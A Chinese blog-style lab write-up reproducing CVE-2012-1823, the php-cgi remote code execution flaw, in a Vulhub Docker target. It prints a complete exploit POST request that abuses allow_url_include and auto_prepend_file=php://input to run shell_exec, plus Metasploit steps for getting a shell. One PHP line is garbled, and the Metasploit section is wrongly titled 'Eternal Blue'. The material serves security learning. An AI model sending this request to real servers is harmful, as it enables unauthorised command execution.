PHP反序列化漏洞之CGI远程代码执行漏洞


一 :准备

提示:搭建靶场和docke环境,看另一篇vulhub靶场搭建

传送门:在Centos7中搭建Vulhub靶场

二:漏洞复现

1.开启靶场

注:CGI远程代码执行漏洞的编号为CVE-2012-1823

我们打开漏洞所处文件夹,开始运行靶场

docker-compose up -d
docker p

在这里插入图片描述

在浏览器中输入ip:8080访问靶场
在这里插入图片描述

2.漏洞利用

* -c 指定php.ini文件的位置
* -n 不要加载php.ini文件
* -d 指定配置项
* -b 启动fastcgi进程
* -s 显示文件源码
* -T 执行指定次该文件
* -h和-? 显示帮助

最简单的利用方式,当然就是-s,可以直接显示源码:
在这里插入图片描述

3.BP抓包构造pyload


在这里插入图片描述

修改请求方式为POST
在这里插入图片描述

构造pyload

POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1
Host: example.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 31

<?php echo shell_exec("id"); ?>

在最后一行写入了

<php? echo shell_exce("ls"):?>

补充:php执行系统命令的4个方法

system()
exec 执行一个外部程序
shell_exec 通过 shell 环境执行命令,并且将完整的输出以字符串的方式返回
passthru  执行外部程序并且显示原始输出

在这里插入图片描述
演示
在这里插入图片描述

4.永恒之蓝渗透

打开kali,输入

msfconsole

在这里插入图片描述
找到phpcgi漏洞的框架

search php cgi

在这里插入图片描述
第八个,直接使用,并查看参数

在这里插入图片描述

设置host和port后开始攻击
在这里插入图片描述
拿到了shell,因为是一个靶场,命令不全面
在这里插入图片描述

总结

提示:这里对文章进行总结:
CVE-2012-1823就是php-cgi这个sapi出现的漏洞,本漏洞只出现在以cgi模式运行的php中。

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

是liku不是里库

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值